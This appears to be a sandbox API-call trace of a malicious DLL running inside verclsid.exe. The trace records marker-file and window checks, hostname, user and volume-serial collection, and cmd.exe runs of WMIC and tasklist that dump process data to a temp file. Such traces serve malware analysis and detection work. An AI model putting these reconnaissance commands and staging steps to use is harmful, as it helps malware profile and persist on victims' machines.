[0382.795] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetFolderLocation", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19
[0382.795] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetFolderLocation", cchWideChar=19, lpMultiByteStr=0x1fa8d00, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHGetFolderLocation", lpUsedDefaultChar=0x0) returned 19
[0382.796] GetProcAddress (hModule=0x7fefe1f0000, lpProcName="SHGetFolderLocation") returned 0x7fefe27a274
[0382.796] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHParseDisplayName", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0382.796] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHParseDisplayName", cchWideChar=18, lpMultiByteStr=0x1fa8d00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHParseDisplayName", lpUsedDefaultChar=0x0) returned 18
[0382.796] GetProcAddress (hModule=0x7fefe1f0000, lpProcName="SHParseDisplayName") returned 0x7fefe274570
[0382.796] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x7fefdf10000
[0382.796] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitialize", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0382.796] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitialize", cchWideChar=12, lpMultiByteStr=0x1fa8d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitialize", lpUsedDefaultChar=0x0) returned 12
[0382.796] GetProcAddress (hModule=0x7fefdf10000, lpProcName="CoInitialize") returned 0x7fefdf2a51c
[0382.797] LoadLibraryW (lpLibFileName="iphlpapi.dll") returned 0x7fefb2c0000
[0382.801] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetTcpTable", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0382.801] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetTcpTable", cchWideChar=11, lpMultiByteStr=0x1fa8d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetTcpTable", lpUsedDefaultChar=0x0) returned 11
[0382.801] GetProcAddress (hModule=0x7fefb2c0000, lpProcName="GetTcpTable") returned 0x7fefb2d13ac
[0382.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetTcpEntry", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0382.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetTcpEntry", cchWideChar=11, lpMultiByteStr=0x1fa8d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetTcpEntry", lpUsedDefaultChar=0x0) returned 11
[0382.802] GetProcAddress (hModule=0x7fefb2c0000, lpProcName="SetTcpEntry") returned 0x7fefb2d2fb0
[0382.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCreateFile", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14
[0382.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCreateFile", cchWideChar=14, lpMultiByteStr=0x1fa8d00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IcmpCreateFile", lpUsedDefaultChar=0x0) returned 14
[0382.802] GetProcAddress (hModule=0x7fefb2c0000, lpProcName="IcmpCreateFile") returned 0x7fefb2c8250
[0382.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCloseHandle", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15
[0382.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCloseHandle", cchWideChar=15, lpMultiByteStr=0x1fa8d00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IcmpCloseHandle", lpUsedDefaultChar=0x0) returned 15
[0382.802] GetProcAddress (hModule=0x7fefb2c0000, lpProcName="IcmpCloseHandle") returned 0x7fefb2c7cc0
[0382.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpSendEcho", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0382.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpSendEcho", cchWideChar=12, lpMultiByteStr=0x1fa8d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IcmpSendEcho", lpUsedDefaultChar=0x0) returned 12
[0382.803] GetProcAddress (hModule=0x7fefb2c0000, lpProcName="IcmpSendEcho") returned 0x7fefb2c8340
[0382.803] DisableThreadLibraryCalls (hLibModule=0xf0000) returned 1
[0382.803] GetCommandLineW () returned="verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
[0382.803] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="Control_RunDLL", cbMultiByte=14, lpWideCharStr=0x1ccb60, cchWideChar=2047 | out: lpWideCharStr="Control_RunDLL") returned 14
[0382.804] DllGetClassObject (rclsid=0x227150*(Data1=0xa78ed123, Data2=0xab77, Data3=0x406b, Data4=([0]=0x99, [1]=0x99, [2]=0x2a, [3]=0x5d, [4]=0x9d, [5]=0x2f, [6]=0x7f, [7]=0xb7)), riid=0x7fefe096cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1ce830)
[0382.804] GetCommandLineW () returned="verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
[0382.806] FindWindowW (lpClassName="msprotB7", lpWindowName="") returned 0x0
[0382.806] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x1ce406 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0382.807] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43
[0382.807] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cchWideChar=43, lpMultiByteStr=0x1f7d9e0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", lpUsedDefaultChar=0x0) returned 43
[0382.807] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cbMultiByte=43, lpWideCharStr=0x1cd320, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat") returned 43
[0382.807] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\c2.dat"), lpFindFileData=0x1ce3b0 | out: lpFindFileData=0x1ce3b0*(dwFileAttributes=0x226a70, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x226a70, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x1036fd, nFileSizeHigh=0x0, nFileSizeLow=0x1ce3d0, dwReserved0=0x0, dwReserved1=0x1ce3f8, cFileName="", cAlternateFileName="߾")) returned 0xffffffffffffffff
[0382.808] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1ce076, nSize=0x105 | out: lpFilename="C:\\Windows\\system32\\verclsid.exe" (normalized: "c:\\windows\\system32\\verclsid.exe")) returned 0x20
[0382.808] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x1ce086 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0382.808] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43
[0382.808] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cchWideChar=43, lpMultiByteStr=0x1f7da30, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", lpUsedDefaultChar=0x0) returned 43
[0382.808] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cbMultiByte=43, lpWideCharStr=0x1ccfa0, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat") returned 43
[0382.809] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\c2.dat"), lpFindFileData=0x1ce030 | out: lpFindFileData=0x1ce030*(dwFileAttributes=0x226a70, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x226a70, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x1036fd, nFileSizeHigh=0x0, nFileSizeLow=0x1ce050, dwReserved0=0x0, dwReserved1=0x1ce078, cFileName="", cAlternateFileName="߾")) returned 0xffffffffffffffff
[0382.809] FindWindowW (lpClassName="msprotB7", lpWindowName="") returned 0x0
[0382.809] FindWindowW (lpClassName="msprot-clonB7", lpWindowName=0x0) returned 0x0
[0382.809] GetModuleFileNameW (in: hModule=0xf0000, lpFilename=0x1ce3c4, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\{d77d06b2-c71e-c031-9266-658fbd2652b7}\\b79266.dll")) returned 0x52
[0382.810] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="task", cbMultiByte=4, lpWideCharStr=0x1cd200, cchWideChar=2047 | out: lpWideCharStr="task+") returned 4
[0382.810] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\{d77d06b2-c71e-c031-9266-658fbd2652b7}\\b79266.dll"), lpFindFileData=0x1ce028 | out: lpFindFileData=0x1ce028*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8f4eb60, ftCreationTime.dwHighDateTime=0x1dab598, ftLastAccessTime.dwLowDateTime=0xf8f4eb60, ftLastAccessTime.dwHighDateTime=0x1dab598, ftLastWriteTime.dwLowDateTime=0xf8f9ae20, ftLastWriteTime.dwHighDateTime=0x1dab598, nFileSizeHigh=0x0, nFileSizeLow=0x35400, dwReserved0=0x0, dwReserved1=0x1ce050, cFileName="B79266.DLL", cAlternateFileName="")) returned 0x2176f0
[0382.810] FileTimeToLocalFileTime (in: lpFileTime=0x1ce02c, lpLocalFileTime=0x1ce278 | out: lpLocalFileTime=0x1ce278) returned 1
[0382.810] FileTimeToSystemTime (in: lpFileTime=0x1ce278, lpSystemTime=0x1ce018 | out: lpSystemTime=0x1ce018) returned 1
[0382.811] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1ce5cc, lpMaximumComponentLength=0x1ce5c8, lpFileSystemFlags=0x1ce5c4, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1ce5cc*=0x8443a5af, lpMaximumComponentLength=0x1ce5c8*=0xff, lpFileSystemFlags=0x1ce5c4*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0382.812] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="1117525688", cbMultiByte=10, lpWideCharStr=0x1cd000, cchWideChar=2047 | out: lpWideCharStr="1117525688") returned 10
[0382.812] LoadLibraryW (lpLibFileName="SHFolder.dll") returned 0x7fef79b0000
[0382.896] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetFolderPathW", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16
[0382.896] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetFolderPathW", cchWideChar=16, lpMultiByteStr=0x1f8c100, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHGetFolderPathW", lpUsedDefaultChar=0x0) returned 16
[0382.896] GetProcAddress (hModule=0x7fef79b0000, lpProcName="SHGetFolderPathW") returned 0x7fef79b12c0
[0382.896] SHGetFolderPathW (in: hwnd=0x0, csidl=103, hToken=0x0, dwFlags=0x0, pszPath=0x1ce086 | out: pszPath="") returned 0x80070057
[0382.897] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1ce086 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0
[0382.908] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\JDownloader 2.0", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48
[0382.908] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\JDownloader 2.0", cchWideChar=48, lpMultiByteStr=0x1f7da80, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\JDownloader 2.0", lpUsedDefaultChar=0x0) returned 48
[0382.909] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\JDownloader 2.0", cbMultiByte=48, lpWideCharStr=0x1ccfa0, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\JDownloader 2.0") returned 48
[0382.909] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\JDownloader 2.0" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\jdownloader 2.0"), lpFindFileData=0x1ce030 | out: lpFindFileData=0x1ce030*(dwFileAttributes=0x226a70, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x226a70, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x1ce086, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x1ce5c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="߾")) returned 0xffffffffffffffff
[0382.909] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="task", cbMultiByte=4, lpWideCharStr=0x1cd200, cchWideChar=2047 | out: lpWideCharStr="task酀\"") returned 4
[0382.909] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="task", cbMultiByte=4, lpWideCharStr=0x1cd200, cchWideChar=2047 | out: lpWideCharStr="task酀\"") returned 4
[0382.910] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="1136.dat", cbMultiByte=8, lpWideCharStr=0x1ccf60, cchWideChar=2047 | out: lpWideCharStr="1136.dat") returned 8
[0382.910] FindFirstFileW (in: lpFileName="1136.dat" (normalized: "c:\\windows\\system32\\1136.dat"), lpFindFileData=0x1cdff0 | out: lpFindFileData=0x1cdff0*(dwFileAttributes=0xbe587109, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x100917, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x1ce860, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xbe587109, nFileSizeHigh=0x0, nFileSizeLow=0x226a70, dwReserved0=0x0, dwReserved1=0x10da8c, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
[0382.910] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x127328 | out: lpWSAData=0x127328) returned 0
[0382.928] gethostname (in: name=0x1ce22b, namelen=100 | out: name="Q9iATrkPrH") returned 0
[0382.981] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="Q9iATrkPrH", cbMultiByte=10, lpWideCharStr=0x1cd170, cchWideChar=2047 | out: lpWideCharStr="Q9iATrkPrH") returned 10
[0382.981] WSACleanup () returned 0
[0383.000] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x117720, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x1ce28c | out: lpThreadId=0x1ce28c*=0xd18) returned 0xd0
[0383.002] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="task", cbMultiByte=4, lpWideCharStr=0x1cd200, cchWideChar=2047 | out: lpWideCharStr="task°\x1c") returned 4
[0383.002] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="msprotB7", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0383.002] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="msprotB7", cchWideChar=8, lpMultiByteStr=0x1f8c1f0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msprotB7", lpUsedDefaultChar=0x0) returned 8
[0383.002] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0383.002] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0383.002] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="msprotB7", cbMultiByte=8, lpWideCharStr=0x1cd1b0, cchWideChar=2047 | out: lpWideCharStr="msprotB7") returned 8
[0383.003] RegisterClassW (lpWndClass=0x1ce248) returned 0xc1bf
[0383.003] CreateWindowExW (dwExStyle=0x10000, lpClassName="msprotB7", lpWindowName="", dwStyle=0x80, X=1, Y=1, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xf0000, lpParam=0x0) returned 0x60386
[0383.007] NtdllDefWindowProc_W () returned 0x0
[0383.007] NtdllDefWindowProc_W () returned 0x1
[0383.012] NtdllDefWindowProc_W () returned 0x0
[0383.017] GetMessageW (lpMsg=0x1ce5d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0)
[0398.724] NtdllDefWindowProc_W () returned 0x0
[0398.724] NtdllDefWindowProc_W () returned 0x0
[0398.724] NtdllDefWindowProc_W () returned 0x0
[0398.724] NtdllDefWindowProc_W () returned 0x0
Thread:
id = 112
os_tid = 0xd1c
Thread:
id = 113
os_tid = 0xd18
[0383.017] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x24cf5d6 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0383.018] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\11.dat", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43
[0383.018] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\11.dat", cchWideChar=43, lpMultiByteStr=0x1f7dad0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\11.dat", lpUsedDefaultChar=0x0) returned 43
[0383.018] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\11.dat", cbMultiByte=43, lpWideCharStr=0x24ce4f0, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\11.dat") returned 43
[0383.018] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\11.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\11.dat"), lpFindFileData=0x24cf580 | out: lpFindFileData=0x24cf580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x1036fd, nFileSizeHigh=0x0, nFileSizeLow=0x24cf5a0, dwReserved0=0x0, dwReserved1=0x24cf5c8, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
[0383.018] Sleep (dwMilliseconds=0x2bf20)
[0398.665] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="cmd.exe", lpParameters="/c WMIC PROCESS where name=\"wininit.exe\" get creationdate |more > %TEMP%\\~dr9078", lpDirectory=0x0, nShowCmd=0) returned 0x2a
[0399.765] Sleep (dwMilliseconds=0x2710)
[0409.783] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x24cf5d6 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0409.785] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="cmd.exe", lpParameters="/c tasklist /fo csv >> C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", lpDirectory=0x0, nShowCmd=0) returned 0x2a
[0409.914] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x7feff870000
[0409.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetUserNameW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0409.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetUserNameW", cchWideChar=12, lpMultiByteStr=0x1f8c250, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetUserNameW", lpUsedDefaultChar=0x0) returned 12
[0409.914] GetProcAddress (hModule=0x7feff870000, lpProcName="GetUserNameW") returned 0x7feff881fd0
[0409.915] GetUserNameW (in: lpBuffer=0x24cf6d6, pcbBuffer=0x24cf6d0 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x24cf6d0) returned 1
[0409.915] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x24cf5d6 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0409.915] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\23.bat", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43
[0409.915] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\23.bat", cchWideChar=43, lpMultiByteStr=0x1f7db20, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\23.bat", lpUsedDefaultChar=0x0) returned 43
[0409.915] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\23.bat", cbMultiByte=43, lpWideCharStr=0x24ce4f0, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\23.bat") returned 43
[0409.915] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\23.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\23.bat"), lpFindFileData=0x24cf580 | out: lpFindFileData=0x24cf580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x1036fd, nFileSizeHigh=0x0, nFileSizeLow=0x24cf5a0, dwReserved0=0x0, dwReserved1=0x24cf5c8, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
[0409.916] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="1136.dat", cbMultiByte=8, lpWideCharStr=0x24ce4b0, cchWideChar=2047 | out: lpWideCharStr="1136.datɌ") returned 8
[0409.917] FindFirstFileW (in: lpFileName="1136.dat" (normalized: "c:\\windows\\system32\\1136.dat"), lpFindFileData=0x24cf540 | out: lpFindFileData=0x24cf540*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x100917, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x24cf5a0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xfa872, nFileSizeHigh=0x25, nFileSizeLow=0x24cf570, dwReserved0=0x0, dwReserved1=0x10367a, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
[0409.917] Sleep (dwMilliseconds=0xbb8)
[0409.919] Sleep (dwMilliseconds=0x0)
[0409.990] Sleep (dwMilliseconds=0xbb8)
[0410.109] Sleep (dwMilliseconds=0x0)
[0410.166] Sleep (dwMilliseconds=0xbb8)
[0410.202] Sleep (dwMilliseconds=0x1f40)
[0410.233] Sleep (dwMilliseconds=0xbb8)
[0410.286] Sleep (dwMilliseconds=0x7d0)
[0410.292] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="c:\\act\\13.dat", cbMultiByte=13, lpWideCharStr=0x24ce3c0, cchWideChar=2047 | out: lpWideCharStr="c:\\act\\13.dat\x0f") returned 13
